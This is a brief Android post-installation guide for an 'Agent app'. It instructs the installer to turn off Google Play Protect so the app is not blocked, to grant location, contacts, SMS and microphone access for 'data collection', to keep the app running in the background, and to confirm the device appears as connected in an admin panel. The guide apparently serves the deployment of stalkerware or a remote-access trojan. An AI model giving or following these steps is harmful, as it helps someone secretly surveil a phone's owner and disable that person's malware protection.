Post-Installation

After the Agent app has been successfully installed, please complete the following steps to ensure stable operation:

1. Turn Off Google Play Protect

   • Prevents the system from automatically blocking or uninstalling the app.

   • Steps: Play Store → Profile → Play Protect → Settings → Turn off.

2. Grant All Required Permissions

   • Open the app → allow requested permissions (Location, Contacts, SMS, Microphone, etc.).

   • Without these permissions, data collection features will not work.

3. Allow Background Activity

   • Ensure the app can run continuously in the background.

   • Steps vary by brand (Samsung, Xiaomi, Oppo, Huawei, Vivo).

   • See section Brand-Specific Instructions for details.

4. Disable Battery Optimization for the App

   • Prevents Android from killing the app while running in the background.

   • Usually under Settings → Apps → Special Access → Battery Optimization → Don’t optimize.

5. Verify Installation

   • Open the Admin Panel (cPanel) → Devices → check if the newly installed device shows as Connected.

   • If status is “Connected”, installation is successful.
